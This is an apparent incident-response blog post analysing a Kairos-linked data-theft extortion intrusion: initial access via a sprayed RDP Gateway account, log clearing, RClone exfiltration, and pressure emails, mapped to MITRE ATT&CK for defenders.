Prepared by: Mike Varley, DFIR Analyst | Last update: 18 February 2026
In early 2025, reports emerged of an Australian hospitality group confirming a cyber incident linked to the Kairos ransomware operation. Unlike traditional ransomware attacks that encrypt systems and demand payment for decryption keys, Kairos is part of a growing wave of threat actors who focus on stealing sensitive information and using it as leverage.
Triskele Labs investigated a Kairos-linked intrusion in 2024, gaining direct visibility into how the group operates. The findings offer a clear reminder that modern extortion tactics are often quiet, targeted, and designed to apply pressure without disrupting business operations.
In the case investigated by Triskele Labs, the attacker gained access through an externally exposed Remote Desktop Gateway. A generic user account was compromised, with the password assessed as vulnerable to password spraying. There was no multi-factor authentication (MFA) in place, and access was not restricted through a VPN. In practical terms, the door was left unlocked. Once valid credentials were obtained, the attacker was able to log in directly without triggering strong security barriers.
This method reflects a broader trend: attackers are increasingly exploiting exposed services and weak authentication controls rather than relying on complex technical exploits.
After gaining access, the attacker attempted to strengthen their position by harvesting credentials and exploring the internal environment. Tools commonly used in post-compromise activity were deployed to attempt privilege escalation and internal movement.
While lateral movement attempts were made using Remote Desktop, SMB and PowerShell, no successful widespread movement was observed in this instance.
However, internal password spraying activity continued, indicating an effort to expand access.
Importantly, the attacker also cleared Windows Event Logs to reduce visibility and complicate forensic investigation. This step is a common tactic designed to delay detection and limit evidence.
The defining feature of Kairos’ approach is what they do not do.
There was no encryption deployed, systems were not locked and operations were not deliberately disrupted.
Instead, the attacker staged and exfiltrated selected data using a legitimate file transfer tool (RClone), transferring it via SFTP to an overseas hosting provider. The data targeted was specific: PDFs, Word documents and other common business document formats, rather than a wholesale extraction of all available data.
This precision suggests a deliberate strategy. By avoiding operational damage, attackers reduce immediate detection and position themselves to apply pressure later through extortion threats.
Rather than deploying ransomware, Kairos used internal communications as a pressure tactic. Emails were sent from a compromised account via Outlook to notify staff of the breach and data theft. There were also attempts to make contact by telephone. This tactic serves multiple purposes; creates internal panic and uncertainty, accelerates executive awareness and pressures organisations to respond quickly.
The threat is not system downtime it's reputational damage and public data exposure. This is known as a single-extortion model, where the leverage lies entirely in the stolen data.
Kairos demonstrates a shift in how extortion operations are conducted:
Reliance on valid credentials rather than noisy exploits
Use of legitimate remote access services
Focused data exfiltration rather than mass encryption
Psychological manipulation through direct communication
They are not necessarily loud or destructive. In fact, the lack of disruption can delay detection and increase the strategic impact of the breach.
The intrusion investigated by Triskele Labs highlights several practical controls that materially reduce risk
Most importantly, organisations should recognise that ransomware is no longer defined by encryption alone. Data theft and extortion now sit at the centre of many modern attacks.
The Kairos model reinforces a clear message: attackers do not need to shut down your business to cause serious harm. Quiet access, selective data theft, and calculated pressure can be just as damaging.
The following technical observations were identified during the Triskele Labs investigation of a Kairos-linked intrusion:
These details are aligned to the MITRE ATT&CK framework to support security and detection teams.
The attacker did not exploit software vulnerabilities; instead, they leveraged weak authentication controls.
Rubeus (Kerberos interaction and ticket manipulation tool)
This phase focused on expanding privileges to enable broader access across the domain.
While large-scale lateral movement was not confirmed in this case, the techniques are consistent with domain-wide expansion attempts.
Clearing Windows Event Logs via PowerShell
Log clearing is a deliberate attempt to reduce forensic visibility and delay detection.
The use of legitimate tooling and alternative protocols reduces the likelihood of detection where outbound traffic monitoring is limited.
Rather than encrypting systems, Kairos relies on data theft and psychological pressure to compel payment — a deliberate single-extortion model.
This mapping reinforces that Kairos does not rely on novel exploits. Instead, the group combines valid credentials, legitimate administrative tooling, and established ATT&CK techniques in a disciplined and controlled manner designed to minimise noise while maximising leverage.
